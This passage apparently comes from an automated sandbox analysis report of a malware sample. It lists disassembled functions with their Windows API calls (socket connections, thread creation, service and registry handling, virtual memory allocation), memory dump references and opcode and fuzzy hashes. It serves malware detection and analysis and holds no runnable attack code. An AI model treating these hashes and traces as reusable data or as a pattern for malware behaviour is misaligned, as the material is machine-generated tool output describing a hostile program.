                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileModuleNameOpenValue
                                                                    • String ID:
                                                                    • API String ID: 1392962279-0
                                                                    • Opcode ID: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction ID: 019c2051241d9139f0c274f4128ff85a6215bdbaab3f752a5bb05957c97b6914
                                                                    • Opcode Fuzzy Hash: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction Fuzzy Hash: 29F04F36A44228FBEB209755CC49FEA7F78EB58750F1000A1F749B50D4DAB09AC4CAA4
                                                                    Function 0041209F Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                    • _beginthreadex.MSVCRT ref: 004120D6
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                    • CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 92035984-0
                                                                    • Opcode ID: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction ID: 15c26be9302d7139859681cd7532fc677a9d9e28b366fa9b608ad3a6ccdbccd6
                                                                    • Opcode Fuzzy Hash: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction Fuzzy Hash: EFF0A4B290022DBFEF01DFA8CD45CEE7BB9EB09251B004565FD21E2265E7318A209B90
                                                                    Function 0040B8CF Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B8DC
                                                                    • htons.WS2_32(?), ref: 0040B8F8
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040B909
                                                                    • closesocket.WS2_32(00000000), ref: 0040B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonssocket
                                                                    • String ID:
                                                                    • API String ID: 3817148366-0
                                                                    • Opcode ID: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction ID: de1538b51f61d1579774b4fba2cf0c220df95499e09b5b0cf3fac34718153d44
                                                                    • Opcode Fuzzy Hash: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction Fuzzy Hash: DAF05E35910238ABEB106BB88C4ABED7668FF05770F108712FA75A62E0D7749741879A
                                                                    Function 10003883 Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 10003890
                                                                    • htons.WS2_32(?), ref: 100038AC
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 100038BD
                                                                    • closesocket.WS2_32(00000000), ref: 100038C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonssocket
                                                                    • String ID:
                                                                    • API String ID: 3817148366-0
                                                                    • Opcode ID: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction ID: 9e11f317ed79feba2931c02fedfeaecc39e7bf7f38e5d0fda9758dd174c25bd2
                                                                    • Opcode Fuzzy Hash: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction Fuzzy Hash: F4F030319103286BE711AB648C49BDD77A8FF047B4F108751F935A61D4E77096408795
                                                                    Function 004115AF Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateGuidInitializeUninitialize_snprintf
                                                                    • String ID:
                                                                    • API String ID: 61646808-0
                                                                    • Opcode ID: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction ID: 67317e8825d2e5dfda3983625b0fce642b825d1024146347727a65b96114f69b
                                                                    • Opcode Fuzzy Hash: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction Fuzzy Hash: D6E0DF30A04328BBEB006BE84C4DF9A7A68FB00686F404410FA15E2195E63092008695
                                                                    Function 00411E0A Relevance: 6.0, APIs: 4, Instructions: 18servicesleepregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseServiceHandle.ADVAPI32(?,00411DF9), ref: 00411E18
                                                                    • CloseServiceHandle.ADVAPI32(?,00411DF9), ref: 00411E2C
                                                                    • RegCloseKey.ADVAPI32(?,00411DF9), ref: 00411E40
                                                                    • Sleep.KERNEL32(000001F4,00411DF9), ref: 00411E4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$HandleService$Sleep
                                                                    • String ID:
                                                                    • API String ID: 994006413-0
                                                                    • Opcode ID: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction ID: 2168d32dfec7fed27758dbb0f6211f74d8a8c88cfebc817e25f46f4c3b036c18
                                                                    • Opcode Fuzzy Hash: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction Fuzzy Hash: 6FE0753281036AEBDF226FA0CDC9A9EB7B6BB04346F8440EAF60560174C7754ED4DE04
                                                                    Function 10009DBE Relevance: 6.0, APIs: 4, Instructions: 18servicesleepregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DCC
                                                                    • CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DE0
                                                                    • RegCloseKey.ADVAPI32(?,10009DAD), ref: 10009DF4
                                                                    • Sleep.KERNEL32(000001F4,10009DAD), ref: 10009DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$HandleService$Sleep
                                                                    • String ID:
                                                                    • API String ID: 994006413-0
                                                                    • Opcode ID: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction ID: ba0a33c1daf7f0af3c97f2baaddd9a82aa66f5124a4b6a8d4d3783b28ce7e623
                                                                    • Opcode Fuzzy Hash: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction Fuzzy Hash: 42E0753185026ADBEF51AFA0CCD9A9DB7B5FB053C6F8140F9E20660068C7314E94DF00
                                                                    Function 024C32F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: b03f53305c6531d4e56e6b4d46cc6c3a3741a97d38f005764214c494d7e0074f
                                                                    • Instruction ID: d06893496b073d2de40113085c47a21f7c30526eda4af56c8fb79f280d749dec
                                                                    • Opcode Fuzzy Hash: b03f53305c6531d4e56e6b4d46cc6c3a3741a97d38f005764214c494d7e0074f
                                                                    • Instruction Fuzzy Hash: 4091AFB8E002199ADBA4DE6DC8806BFBFA1AF44724F74C59FE855A7390D770D9808B14
                                                                    Function 0252D677 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: [
                                                                    • API String ID: 48624451-784033777
                                                                    • Opcode ID: d303d9cbccb44c0c8dde02a755f4b0dc86ad410793161eee0eea7cf7ba406c92
                                                                    • Instruction ID: 6826222127b3e248d6dc4d9d5a55989d2cf0fb309a029920748385dcf4f94efd
                                                                    • Opcode Fuzzy Hash: d303d9cbccb44c0c8dde02a755f4b0dc86ad410793161eee0eea7cf7ba406c92
                                                                    • Instruction Fuzzy Hash: 38215176A01129AB8B50DE79C840AFEBBF9EF15244F58012AEC45D7284EB35E605CBA4
                                                                    Function 10006B8E Relevance: 5.1, APIs: 4, Instructions: 68memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(?,00800068,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006BE4
                                                                    • memset.MSVCRT ref: 10006BEF
                                                                    • VirtualAlloc.KERNEL32(?,10004ED2,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006C05
                                                                    • memcpy.MSVCRT(00000000,10004ED2,10004ED2), ref: 10006C14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual$memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 2542864682-0
                                                                    • Opcode ID: a2f7f8fa6422af3310233a552f7b29640331760feec5f913bdf73a1763845b24
                                                                    • Instruction ID: a21920bec02cab8d9cdc451f3b89064926b65b0e05a2826f81f214c4d3d1f21a
                                                                    • Opcode Fuzzy Hash: a2f7f8fa6422af3310233a552f7b29640331760feec5f913bdf73a1763845b24
                                                                    • Instruction Fuzzy Hash: 9C2115B1900208AFEB10DF99CC85FA9B7F9EF08345F11846AE945AB251D374AE90CB50